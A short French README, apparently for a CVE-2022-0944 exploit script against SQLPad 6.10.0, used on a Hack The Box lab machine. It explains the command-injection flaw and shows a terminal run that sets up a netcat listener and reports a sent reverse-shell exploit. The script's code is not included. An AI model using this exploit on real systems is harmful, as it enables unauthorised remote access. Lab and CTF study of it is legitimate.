
Refurbish
Ce script Bash exploite une vulnérabilité RCE dans SQLPad 6.10.0, permettant à un attaquant d'exécuter du code à distance (RCE) en abusant des champs host et database dans les paramètres de connexion MySQL de SQLPad. L'exploit tire parti de la gestion non assainie du module child_process dans Node.js pour exécuter des commandes arbitraires, ouvrant finalement un shell inverse sur la machine de l'attaquant.
nc -lvnp 9001.┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com):
x.example.com
Please provide your IP address (e.g., 10.10.16.3):
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
Ce code est uniquement à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. N'utilisez cet exploit qu'avec une autorisation.